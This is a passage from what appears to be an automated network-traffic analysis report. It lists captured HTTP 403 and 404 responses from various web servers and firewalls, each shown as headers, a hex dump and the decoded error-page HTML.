6e 65 2d 62 6c 6f 63 6b 3b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 3b 0a
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Wed, 22 Mar 2023 04:45:14 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:14 GMTContent-Type: text/htmlContent-Length: 559Connection: keep-aliveServer: IdeaWebServer/5.1.0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 69 64 65 61 2f 73 74 61 74 69 63 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 2d 73 74 72 6f 6e 67 22 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 64 65 73 63 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 64 6f 63 75 6d 65 6e 74 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 20 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Error 403</title><link href="/idea/static/style.css" rel="stylesheet"></head><body><div class="error-container"><div class="error-text"><h1>Error</h1></div><div class="error-text-strong"><h1>403</h1></div><div class="error-text"><h1>Forbidden</h1></div></div><div class="error-descr-container"><p>You don't have permission to access this document.</p></div> </body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 22 Mar 2023 04:45:15 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 22 Mar 2023 04:45:15 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:15 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMdR+KIVPfgRMI8Uu3xBu5ub,qquldgcFrj2n046g4RNSVMxfheUO4XmnqrwYf15pULU=X-Wix-Request-Id: 1679460315.83327234204423579X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Wed, 22 Mar 2023 04:45:15 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15003X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: FBP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 63 66 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, must-revalidateContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Wed, 22 Mar 2023 04:45:15 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: Jmu7f1uI/O4zFEdOhData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:16 GMTContent-Type: text/htmlContent-Length: 559Connection: keep-aliveServer: IdeaWebServer/5.1.0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 69 64 65 61 2f 73 74 61 74 69 63 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 2d 73 74 72 6f 6e 67 22 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 64 65 73 63 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 64 6f 63 75 6d 65 6e 74 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 20 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Error 403</title><link href="/idea/static/style.css" rel="stylesheet"></head><body><div class="error-container"><div class="error-text"><h1>Error</h1></div><div class="error-text-strong"><h1>403</h1></div><div class="error-text"><h1>Forbidden</h1></div></div><div class="error-descr-container"><p>You don't have permission to access this document.</p></div> </body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:16 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Cf-Railgun: f7ed579b4f stream 0.000000 0200 57daPragma: no-cacheVary: User-Agent,User-AgentX-Turbo-Charged-By: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wxIDZipHvm%2BuwzJpX1DP7l5VY%2F0j7ZCR%2FjXxIIDEnGlAvacbhq7E4ZXZYfiM9roezrwZUfIL7IyneAd%2FBSXj9HIMN1IXX%2B9mtgC3EwWS9inFLEPDFSK7PJ1rzk0DCpl8aTQ%3D"}],"group":"cf-nel","max_age":604800}NEL: 